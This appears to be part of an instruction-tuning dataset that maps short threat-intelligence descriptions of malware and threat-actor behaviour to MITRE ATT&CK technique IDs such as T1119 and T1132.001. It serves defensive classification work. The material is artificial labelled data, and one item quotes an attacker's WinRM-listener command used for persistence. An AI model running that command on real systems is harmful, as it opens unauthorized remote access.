framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT1 used a batch script to perform a series of discovery techniques and saves it to a text file.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bankshot recursively generates a list of files within a directory and sends them back to the control server.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Confucius has used a file stealer to steal documents and images with the following extensions: txt, pdf, png, jpg, doc, xls, xlm, odp, ods, odt, rtf, ppt, xlsx, xlsm, docx, pptx, and jpeg.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Frankenstein, the threat actors used Empire to automatically gather the username, domain name, machine name, and other system information.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation Wocao, threat actors used a script to collect information about the infected system.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Frankenstein has enumerated hosts via Empire, gathering the username, domain name, machine name, and other system information.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GoldFinder logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "InvisiMole can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MESSAGETAP checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt).", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Patchwork developed a file stealer to search C:\\ and collect files with certain extensions. Patchwork also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PoshC2 contains a module for recursively parsing through files and directories to gather valid credit card numbers.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ramsay can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Ferocious can run \"\"GET.WORKSPACE\"\" in Microsoft Excel to check if a mouse is present.\"", + "output": "- T1120: Peripheral Device Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "jRAT can map UPnP ports.", + "output": "- T1120: Peripheral Device Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Empire can use built-in modules to abuse trusted utilities like MSBuild.exe.", + "output": "- T1127.001: Trusted Developer Utilities Proxy Execution - MSBuild\n- T1127: Trusted Developer Utilities Proxy Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Frankenstein, the threat actors used MSbuild to execute an actor-created file.", + "output": "- T1127.001: Trusted Developer Utilities Proxy Execution - MSBuild" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After encrypting C2 data, BADNEWS converts it into a hexadecimal representation and then encodes it into base64.", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "H1N1 obfuscates C2 traffic with an altered version of base64.", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Linux Rabbit sends the payload from the C2 server as an encoded URL parameter.", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ursnif has used encoded data in HTTP URLs for C2.", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "An APT19 HTTP malware variant used Base64 to encode communications to the C2 server.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Astaroth encodes data using Base64 before sending it to the C2 server.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AutoIt backdoor has sent a C2 response that was base64-encoded.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bisonal has encoded binary data with Base64 and ASCII.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Elise exfiltrates data using cookie values that are Base64-encoded.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kessel has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete has used base64 encoding.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Misdat network traffic is Base64-encoded plaintext.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MuddyWater has used tools to encode C2 communications including Base64 encoding.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Patchwork used Base64 to encode C2 traffic.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PingPull can encode C2 traffic with Base64.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QakBot can Base64 encode system information sent to C2.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Responses from the Pisloader C2 server are base32-encoded.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RogueRobin base64 encodes strings that are sent to the C2 over its DNS tunnel.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "STARWHALE has the ability to hex-encode collected data from an infected host.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sliver can use standard encoding techniques like gzip and hex to ASCII to encode the C2 communication payload.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some Backdoor.Oldrea samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tropic Trooper has used base64 encoding to hide command strings delivered from the C2.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Valak has returned C2 data as encoded ASCII.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "down_new has the ability to base64 encode C2 communications.", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cyclops Blink can use a custom binary scheme to encode messages with specific commands and parameters to be executed.", + "output": "- T1132.002: Data Encoding - Non-Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ShadowPad has encoded data as readable Latin characters.", + "output": "- T1132.002: Data Encoding - Non-Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Small Sieve can use a custom hex byte swapping encoding scheme to obfuscate tasking traffic.", + "output": "- T1132.002: Data Encoding - Non-Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chimera has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services.", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During CostaRicto, the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment.", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"During Operation CuckooBees, the threat actors enabled WinRM over HTTP/HTTPS as a backup persistence mechanism using the following command: `cscript //nologo \"\"C:\\Windows\\System32\\winrm.vbs\"\" set winrm/config/service@{EnableCompatibilityHttpsListener=\"\"true\"\"}`.\"", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky has used RDP to establish persistence.", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN6 has used has used Metasploit\u2019s named-pipe impersonation technique to escalate privileges.", + "output": "- T1134: Access Token Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BitPaymer can use the tokens of users to create processes on infected systems.", + "output": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FinFisher uses token manipulation with NtFilterToken as part of UAC bypass.", + "output": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft" + }, + { 